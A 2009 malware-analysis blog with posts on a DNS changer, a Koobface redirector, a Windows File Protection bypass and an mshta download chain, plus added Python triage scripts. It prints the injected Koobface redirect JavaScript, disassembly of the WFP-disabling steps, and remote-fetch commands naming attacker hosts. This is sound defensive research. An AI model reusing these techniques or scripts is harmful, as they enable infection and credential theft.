R3v3rs3e's Blog

Posts Tagged ‘malware’

Eric Dane threesome video links used to serve DNS Changer malware

Posted by Steve Espino on August 19, 2009


A recently leaked threesome sex tape involving Grey’s Anatomy’s “McSteamy” Eric Dane and his wife Rebecca Gayheart has been circulating around the internet. As we all know, controversial material like this is routinely exploited to distribute malware through social engineering and SEO (search-engine optimization). Users of one particular website have been spotted discussing the sex tape. There is no video on the site itself, so people wanting to see it may be enticed to click links posted by fraudulent users and are tricked into downloading and installing malware on their computers.

There’s one such post suggesting we go to hentaiplace.org to watch the leaked video:

[screenshot: 3somecomment]

Here the malware poses as a fake video codec, “Divxcoder”, that users supposedly need to install in order to watch the video:
hxxp://hentaiplace.org/play.php?id=Eric_Dane_and_Rebecca_Gayheart_sex_tape

[screenshot: hentaiplace]

Following the download link hxxp://hentaiplace.org/promo.php, we are redirected to hxxp://fiopolosa.com/download/7933547766773d3dd846130c20090815/FlashCodecPlugin.exe

The malware presents the user with a License Agreement while doing its dubious deeds in the background. You don’t even need to accept the License Agreement for the malware to install!

[screenshot: divxcoder]

The malware changes the affected computer’s DNS settings to use the following IP addresses as DNS servers:
85.255.112.80
85.255.112.168

This means that every name lookup from the affected computer goes to these IPs, which gives the bad guys a very good opportunity to redirect users to fake websites and steal passwords, login details and other confidential information. The victim does not have to do anything wrong: a correctly typed bank address resolves to whatever the rogue resolver answers, and only a TLS certificate warning stands between the user and the fake site.

PC Tools Spyware Doctor detects the malware as Trojan.DNS_Changer.

The malware also employs Rootkit.TDSS and Trojan.TDSServ components to hide its presence on the infected machine.
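The two resolver addresses above are the durable indicator of this infection, so the quickest triage on a suspect machine is to compare its configured DNS servers against them. The following is an added example, not code from the original post: it pulls the DNS server lines out of `ipconfig /all` output and out of a per-interface NameServer registry value, and flags any resolver that falls in the indicator list. The `ipconfig` text and the registry value are constructed samples, and the 85.255.112.0/20 entry is an assumption based on later public reporting about this DNSChanger gang; drop it if you want only the two exact addresses from the post.

```python
import ipaddress
import re

# Indicators from the post: the two resolvers the DNS changer writes into the
# victim's TCP/IP settings. The /20 is an assumption: both addresses fall in
# 85.255.112.0/20, which later public reporting tied to the same DNSChanger
# gang; remove it if you only want the two exact addresses.
ROGUE_DNS = [
    ipaddress.ip_network("85.255.112.80/32"),
    ipaddress.ip_network("85.255.112.168/32"),
    ipaddress.ip_network("85.255.112.0/20"),
]

# Constructed sample of `ipconfig /all` output from an infected XP host
# (not captured from the sample discussed in the post).
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.10
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
        DNS Servers . . . . . . . . . . . : 85.255.112.80
                                            85.255.112.168
"""

# Constructed sample of the per-interface NameServer value under
# HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID},
# which is where the TCP/IP stack keeps statically configured resolvers.
SAMPLE_NAMESERVER_VALUE = "85.255.112.80,85.255.112.168"


def dns_servers_from_ipconfig(text):
    """Return the DNS server addresses listed in `ipconfig /all` output.

    The 'DNS Servers' line carries the first address; continuation lines
    that hold nothing but whitespace and an address carry the rest.
    """
    servers = []
    collecting = False
    for line in text.splitlines():
        m = re.match(r"\s*DNS Servers[ .]*:\s*(\S+)", line)
        if m:
            servers.append(m.group(1))
            collecting = True
            continue
        if collecting:
            m = re.match(r"\s+(\d+\.\d+\.\d+\.\d+)\s*$", line)
            if m:
                servers.append(m.group(1))
                continue
            collecting = False
    return servers


def dns_servers_from_registry(value):
    """Split a NameServer registry value (comma or space separated)."""
    return [s for s in re.split(r"[,\s]+", value.strip()) if s]


def rogue_resolvers(servers, indicators=ROGUE_DNS):
    """Return the subset of `servers` that sits inside a known-rogue network."""
    hits = []
    for s in servers:
        try:
            addr = ipaddress.ip_address(s)
        except ValueError:
            continue  # ignore junk such as a trailing "(Preferred)"
        if any(addr in net for net in indicators):
            hits.append(s)
    return hits


if __name__ == "__main__":
    for label, servers in (("ipconfig", dns_servers_from_ipconfig(SAMPLE_IPCONFIG)),
                           ("registry", dns_servers_from_registry(SAMPLE_NAMESERVER_VALUE))):
        bad = rogue_resolvers(servers)
        print(f"{label}: {servers} -> {'ROGUE ' + str(bad) if bad else 'clean'}")
```

On a live host, feed it the real `ipconfig /all` output or the NameServer values from the Interfaces key; a hit on either means name resolution is already in the attacker’s hands, and cleaning the resolver entries has to come after removing the TDSS components, or the setting will simply be written back.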

Posted in Malicious Intent

Facebook: Rogue AV Farm?

Posted by Steve Espino on August 10, 2009

There has been enormous Koobface activity lately, mostly driven by social networking websites such as Facebook, Tagged, MySpace, Twitter and many others.

The social networking website that probably tops the list of sites used as attack vectors is Facebook.

Here’s a screenshot of a spoofed Facebook website:

[screenshot: koob1]

We are presented with a fake codec alert, and unsuspecting users typically download and install a piece of malware that PC Tools Spyware Doctor aptly detects as Net-Worm.Koobface.

[screenshot: koob2]

We have seen Koobface hosted on kukuruku-290709(dot)com, but thanks to all the good guys out there that site has been taken down. The bad guys have responded and are now using legitimate domains and redirections to serve Koobface. We have seen a small patch of code on the websites used in the redirection:

wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrq

The strings are random, and so are the names of the JavaScript files being loaded.

Here’s what the JavaScript file has to offer:

// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
// referrer substring -> landing page on the Koobface server
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
// The loop header and the start of the if() were eaten by the blog's HTML
// rendering; they are reconstructed here from the surviving lines.
for (var i = 0; i < redirects.length; i++) {
  if (s.indexOf(redirects[i][0]) != -1) {
    var redir = redirects[i][1] + ss;
    // tell the server which compromised host sent this visitor
    if (ss.length > 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
    location.href = redir;
    r = true;
    break;
  }
}
// no known social network in the referrer: generic landing page
if (!r) location.href = abc+'index.php'+ location.search;

Since kukuruku-290709(dot)com has already been taken down, we’ll most likely soon see new domains emerge to host Koobface. Note how the script picks the landing page from the referrer, so a victim arriving from Facebook gets fb.php, one from Twitter gets tw.php, and so on, and how it appends the compromised site’s hostname as a domain= parameter, which tells the gang which of their redirectors delivered each visitor.

One of Koobface’s payloads is downloading other malware, and it is currently serving rogue AVs, including one that PC Tools Spyware Doctor detects as RogueAntiSpyware.System Security.

We’ve talked about RogueAntiSpyware.System Security in a previous post.

[screenshot: system_security_scan]

A few weeks ago there was a lot of buzz about Facebook’s Farm Town app serving up rogue AVs, and now Facebook is once again associated with rogue AVs. Clearly the bad guys behind these attacks are trying to make a quick buck by promoting scareware. Social engineering lets malware and scareware spread quickly and easily because attackers can hide behind the names of the very people we trust.

Take extreme care when viewing emails, tweets, comments or posts, even if they came from people we know.

Posted in Malicious Intent, Rogue Apps

Malware foils Windows File Protection

Posted by Steve Espino on August 3, 2009

I came across a malware sample that replaces %system%\comres.dll, so that the malware runs every time this library is loaded.

This file is in fact protected by Windows File Protection, a feature introduced in Windows 2000.

According to this Microsoft article:

Windows File Protection (WFP) prevents programs from replacing critical Windows system files. Programs must not overwrite these files because they are used by the operating system and by other programs. Protecting these files prevents problems with programs and the operating system.

In this post we’ll look at how the malware bypasses Windows File Protection in order to replace the critical system file %system%\comres.dll with a copy of itself.

The malware first disables the Windows File Protection feature (yes, it can be disabled!):


PUSH 0 ; /IsShown = 0
PUSH Avidm_dl.00BBAB7C ; |DefDir = ""
PUSH Avidm_dl.00AC54D8 ; |Parameters = "/REVERT"
PUSH EAX ; |C:\WINDOWS\system32\sfc.exe
PUSH Avidm_dl.00AC54D0 ; |Operation = "open"
PUSH 0 ; |hWnd = NULL
CALL DWORD PTR DS:[] ; \ShellExecuteA
...
PUSH ECX ; /pHandle
PUSH 0F003F ; |Access = KEY_ALL_ACCESS
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC5498 ; |Subkey = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
CALL DWORD PTR DS:[] ; \RegOpenKeyExA
MOV EAX,DWORD PTR SS:[ESP+10]
LEA EDX,DWORD PTR SS:[ESP+14]
PUSH 4 ; /BufSize = 4
PUSH EDX ; |0xffffff9d
PUSH 4 ; |ValueType = REG_DWORD
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC548C ; |ValueName = "SfcDisable"
PUSH EAX ; |hKey
MOV DWORD PTR SS:[ESP+2C],-63 ; |
CALL DWORD PTR DS:[] ; \RegSetValueExA
MOV ECX,DWORD PTR SS:[ESP+10]
PUSH ECX ; /hKey
CALL DWORD PTR DS:[] ; \RegCloseKey

The value 0xFFFFFF9D (-99) written to SfcDisable is the well-known switch that makes Winlogon skip WFP initialization, but it is only read at the next boot, so the malware also has to get past the protection in the running session. It first saves a copy of %system%\sfc_os.dll as %system%\sfc_my.dll:


PUSH 1 ; /FailIfExists = TRUE
REPNE SCAS BYTE PTR ES:[EDI] ; |
MOV ECX,EBP ; |
DEC EDI ; |
SHR ECX,2 ; |
REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; |
MOV ECX,EBP ; |
LEA EAX,DWORD PTR SS:[ESP+120] ; |
AND ECX,3 ; |
PUSH EAX ; |new filename: C:\WINDOWS\system32\sfc_my.dll
REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; |
LEA ECX,DWORD PTR SS:[ESP+228] ; |
PUSH ECX ; |existing filename: C:\WINDOWS\system32\sfc_os.dll
CALL DWORD PTR DS:[] ; \CopyFileA

It then loads the newly copied file and resolves export ordinal #5, the undocumented API SetSfcFileException, which it calls to exempt %system%\comres.dll (Windows COM services) from Windows File Protection:


PUSH EDX ; /C:\WINDOWS\system32\sfc_my.dll
CALL DWORD PTR DS:[] ; \LoadLibraryA
PUSH 5 ; /ProcNameOrOrdinal = #5
PUSH EAX ; |hModule
CALL DWORD PTR DS:[] ; \GetProcAddress
...
PUSH EDX ; c:\windows\system32\comres.dll
PUSH 0
CALL EBP ; sfc_my.#5

[screenshot: ordinal5]

The malware then renames the original comres.dll to comresdk.dll and deletes comres.dll from %dllcache%, the pristine copy WFP would otherwise use to restore the file. With both out of the way it is free to drop itself as comres.dll in %system%:


PUSH EDX ; /newname: comresdk.dll
PUSH EAX ; |oldname: comres.dll
CALL ; \rename
...
PUSH EDX ; /path=C:\WINDOWS\system32\dllcache\comres.dll
CALL ; \remove
...
PUSH 1 ; /FailIfExists = TRUE
PUSH EAX ; |NewFilename: C:\WINDOWS\system32\comres.dll
PUSH ECX ; |ExistingFilename:
CALL DWORD PTR DS:[] ; \CopyFileA

There we have it, folks: the malware foiled Windows File Protection using perfectly legitimate and readily available methods. The lesson is that WFP was never a security boundary against code already running with administrative rights; it guards against accidental overwrites, not against an attacker who can edit Winlogon keys and call into sfc_os.dll. Later Windows versions replaced it with Windows Resource Protection, which puts TrustedInstaller-owned ACLs on protected files, though that too only raises the bar for an administrator rather than stopping one.
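The artifacts this sample leaves behind (the SfcDisable value, sfc_my.dll, comresdk.dll, and a comres.dll with no twin in dllcache) make a compact triage check. The following is an added example and not the author’s code: the assessment functions take the collected state as plain values so they run anywhere, and `collect_live_state()` gathers that state on a Windows host. The paths, key and value names come from the listings above; the function names and the constructed infected/clean states are mine.

```python
import sys

# Magic value the sample writes to HKLM\...\Winlogon\SfcDisable. The listing
# above stores it as MOV DWORD PTR SS:[ESP+2C],-63, i.e. -99 == 0xFFFFFF9D.
SFC_DISABLE_MAGIC = 0xFFFFFF9D

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"


def sfc_disable_is_set(value):
    """True if a SfcDisable REG_DWORD carries the WFP-off magic.

    The registry hands back an unsigned DWORD (4294967197); debuggers and
    some tools show it signed (-99). Both forms are accepted.
    """
    if value is None:
        return False
    return (value & 0xFFFFFFFF) == SFC_DISABLE_MAGIC


def assess_wfp_tampering(sfc_disable, system32, dllcache):
    """Compare collected state against the artifacts this sample leaves.

    sfc_disable: the SfcDisable value (int) or None if the value is absent
    system32:    set of lower-case file names in %system%
    dllcache:    set of lower-case file names in %system%\\dllcache
    Returns a list of human-readable findings (empty means nothing matched).
    """
    findings = []
    if sfc_disable_is_set(sfc_disable):
        findings.append("SfcDisable=0xFFFFFF9D: WFP will not start at next boot")
    if "sfc_my.dll" in system32:
        findings.append("sfc_my.dll: private copy of sfc_os.dll (ordinal #5 abuse)")
    if "comresdk.dll" in system32:
        findings.append("comresdk.dll: original comres.dll renamed aside")
    if "comres.dll" in system32 and "comres.dll" not in dllcache:
        findings.append("comres.dll has no copy in dllcache: WFP cannot restore it")
    return findings


def collect_live_state():
    """Gather the three inputs on a live Windows host; returns None elsewhere.

    Assumed convenience wrapper (XP-era layout), not part of the sample.
    """
    if sys.platform != "win32":
        return None
    import os
    import winreg

    system32 = os.path.join(os.environ["SystemRoot"], "system32")
    dllcache = os.path.join(system32, "dllcache")
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY)
    try:
        value, _ = winreg.QueryValueEx(key, "SfcDisable")
    except FileNotFoundError:
        value = None
    finally:
        winreg.CloseKey(key)

    def names(path):
        return {n.lower() for n in os.listdir(path)} if os.path.isdir(path) else set()

    return value, names(system32), names(dllcache)


if __name__ == "__main__":
    state = collect_live_state()
    if state is None:
        # Constructed state mirroring the post-infection layout described above.
        state = (-99, {"comres.dll", "comresdk.dll", "sfc_os.dll", "sfc_my.dll"},
                 {"kernel32.dll"})
    for finding in assess_wfp_tampering(*state) or ["no WFP tampering artifacts found"]:
        print(finding)
```

A clean XP box has SfcDisable absent or 0, no sfc_my.dll or comresdk.dll, and a comres.dll in both %system% and dllcache; any single finding is worth a closer look, and all four together is this sample.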

Posted in Malicious Intent

Digital clutter

Posted by Steve Espino on July 29, 2009

In relation to a previous post, visiting the malicious domain

hxxp://zusojbktvo.cn/fin.php

leads to the download of

hxxp://woqyymmptn.cn/setup/setup.exe

This malware in turn runs the Microsoft HTML Application host (mshta.exe) to execute hxxp://enjnzdfmts.cn/33t.php, so the real payload is whatever that page serves at the time:

00400256 >/$ 6A 00 PUSH 0 ; /IsShown = 0
00400258 |. 6A 00 PUSH 0 ; |DefDir = NULL
0040025A |. 68 39024000 PUSH setup.00400239 ; |Parameters = "http://enjnzdfmts.cn/33t.php"
0040025F |. 68 2F024000 PUSH setup.0040022F ; |FileName = "mshta.exe"
00400264 |. 6A 00 PUSH 0 ; |Operation = NULL
00400266 |. 6A 00 PUSH 0 ; |hWnd = NULL
00400268 |. E8 81010000 CALL ; \ShellExecuteA

The URL hxxp://enjnzdfmts.cn/33t.php returns a page with obfuscated JavaScript:

[screenshot: 33t]

which decodes to:

[screenshot: 33t.deobfuscated]

The script basically creates and executes files in an attempt to download and install more malware on the affected machine. In the process it opens an FTP connection to woqyymmptn.cn with the following credentials:


username: qqq
password: 123456

[screenshot: ftp]

It also creates a batch file that registers numerous Scheduled Tasks, each running mshta.exe to execute hxxp://woqyymmptn.cn/33t.php, which does essentially the same thing as the script above.

[screenshot: jobs]

hxxp://12-2005-search.com/cool.exe is then downloaded and executed as %Temp%\675.exe. The download link, however, is no longer active.


004002CD . 68 90000000 PUSH 90
004002D2 . 891C24 MOV DWORD PTR SS:[ESP],EBX
004002D5 . 68 90000000 PUSH 90
004002DA . C70424 0401000>MOV DWORD PTR SS:[ESP],104
004002E1 . 68 D0034000 PUSH
004002E6 . 58 POP EAX
004002E7 . E8 00000000 CALL setup.004002EC
004002EC $ 830424 06 ADD DWORD PTR SS:[ESP],6
004002F0 . FFE0 JMP EAX ;
004002F2 E8 DB E8
004002F3 01 DB 01
004002F4 00 DB 00
004002F5 00 DB 00
004002F6 . 0008 ADD BYTE PTR DS:[EAX],CL
004002F8 . 5D POP EBP
004002F9 . 33C9 XOR ECX,ECX
004002FB . 8A4D 00 MOV CL,BYTE PTR SS:[EBP]
004002FE . 8BFB MOV EDI,EBX
00400300 . 03F8 ADD EDI,EAX
00400302 . BE 08024000 MOV ESI,setup.00400208 ; ASCII "675.exe"
00400307 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
00400309 . 51 PUSH ECX
0040030A . 51 PUSH ECX
0040030B . 53 PUSH EBX
0040030C . E8 23000000 CALL setup.00400334
00400311 . 68 74 74 70 3A>ASCII "http://"
00400318 . 31 32 2D 32 30>ASCII "12-2005-search.c"
00400328 . 6F 6D 2F 63 6F>ASCII "om/cool.exe",0
00400334 $ 51 PUSH ECX
00400335 . 68 E2034000 PUSH
0040033A . 58 POP EAX
0040033B . E8 00000000 CALL setup.00400340
00400340 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400344 . FFE0 JMP EAX
00400346 . 51 PUSH ECX
00400347 . 53 PUSH EBX
00400348 . 68 DC034000 PUSH
0040034D . 58 POP EAX
0040034E . E8 00000000 CALL setup.00400353
00400353 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400357 . FFE0 JMP EAX

Two tricks in the listing above are worth spelling out. The CALL setup.004002EC / ADD DWORD PTR SS:[ESP],6 / JMP EAX sequence pushes the address of the ADD, bumps it past the two-byte JMP and jumps to the routine in EAX: a hand-rolled CALL EAX that leaves no direct API call for a scanner to see, and the same pattern is repeated at 0040033B and 0040034E. The CALL setup.00400334 at 0040030C jumps over the “http://12-2005-search.com/cool.exe” string, so the return address it pushes is the string’s own address and the CALL doubles as a PUSH of the URL. The malware uses random filenames, as we can see from the filenames in the embedded script above; these are possibly generated by the PHP code behind it.

In effect, the malware creates heaps of batch files, text files, blank .exe files (the download being unavailable) and .job files on the affected system. Talk about heavy digital clutter!
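Scheduled Tasks that launch mshta.exe with a remote URL are the persistence artifact here, and they are easy to spot in `schtasks /query /fo csv /v` output. The following added example (not code from the original post) parses that CSV, flags every task whose command runs mshta against an http(s) URL, and counts how many tasks share the same command line, which is what the clutter looks like from the task scheduler’s side. The CSV sample is constructed to mirror the behaviour described above, with column names as XP’s schtasks prints them (an assumption), and the benign rows are made up.

```python
import csv
import io
import re
from collections import Counter

# Matches "mshta.exe http://..." in a command line, tolerating a path before
# the binary and quotes around the binary or the URL.
MSHTA_REMOTE = re.compile(
    r'(?:^|[\\/\s"])mshta(?:\.exe)?"?\s+"?(https?://\S+)', re.IGNORECASE)

# Constructed sample of `schtasks /query /fo csv /v` output (XP-style column
# names, trimmed to a few columns). The At* tasks mirror what the batch file
# in the post creates; the other two rows are made-up benign tasks.
SAMPLE_SCHTASKS_CSV = '''\
"HostName","TaskName","Next Run Time","Status","Task To Run","Comment","Scheduled Task State"
"VICTIM-XP","At1","14:00:00, 29/07/2009","","mshta.exe http://woqyymmptn.cn/33t.php","N/A","Enabled"
"VICTIM-XP","At2","14:05:00, 29/07/2009","","mshta.exe http://woqyymmptn.cn/33t.php","N/A","Enabled"
"VICTIM-XP","Defrag","N/A","","%SystemRoot%\\system32\\defrag.exe C:","N/A","Enabled"
"VICTIM-XP","Local HTA","N/A","","mshta.exe C:\\Tools\\helper.hta","N/A","Enabled"
'''


def parse_schtasks_csv(text):
    """Turn schtasks CSV into a list of dicts keyed by column name.

    The header row is recognised by its TaskName / Task To Run columns and
    may repeat (newer schtasks prints it once per task folder), so every
    header occurrence is skipped rather than treated as a task.
    """
    rows, header = [], None
    for row in csv.reader(io.StringIO(text)):
        if not row:
            continue
        if "TaskName" in row and "Task To Run" in row:
            header = row
            continue
        if header is not None:
            rows.append(dict(zip(header, row)))
    return rows


def find_remote_hta_tasks(rows):
    """Return (task name, url) for every task that runs mshta on a remote URL.

    A task that runs mshta on a local .hta is not reported: it is the
    remote fetch that makes this pattern a download cradle.
    """
    hits = []
    for row in rows:
        m = MSHTA_REMOTE.search(row.get("Task To Run", ""))
        if m:
            hits.append((row.get("TaskName", "?"), m.group(1).rstrip('"')))
    return hits


def command_counts(rows):
    """How many tasks share each command line; a high count for one mshta
    command is the 'clutter' pattern from the post."""
    return Counter(row.get("Task To Run", "") for row in rows)


if __name__ == "__main__":
    rows = parse_schtasks_csv(SAMPLE_SCHTASKS_CSV)
    for name, url in find_remote_hta_tasks(rows):
        print(f"{name}: mshta -> {url}")
    for cmd, n in command_counts(rows).most_common(1):
        print(f"most repeated command ({n} tasks): {cmd}")
```

On a live XP host, redirect `schtasks /query /fo csv /v` to a file and pass its contents to `parse_schtasks_csv`; the .job files themselves live in %SystemRoot%\Tasks and should be removed along with the batch file that recreates them.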

Posted in Malicious Intent

Malicious domain uses old IE Vulnerability to download and install malware

Posted by Steve Espino on July 28, 2009

Visiting the malicious URL:

hxxp://zusojbktvo.cn/md/t.html

gives us a blank page at first sight.

[screenshot: blank]

However, on closer inspection we are presented with the following:

[screenshot: code]

which decodes to the following shellcode:

[screenshot: shellcode]

Analyzing the shellcode shows that it downloads

hxxp://pxciiruurw.cn/new/load.exe

which is saved and executed as:

c:\ 0xf9.exe

Microsoft had already released a patch for this vulnerability, MS08-078 (the Internet Explorer XML data-binding bug, CVE-2008-4844), back in December 2008, so only unpatched machines are at risk from this page.

Posted in Vulnerabilities
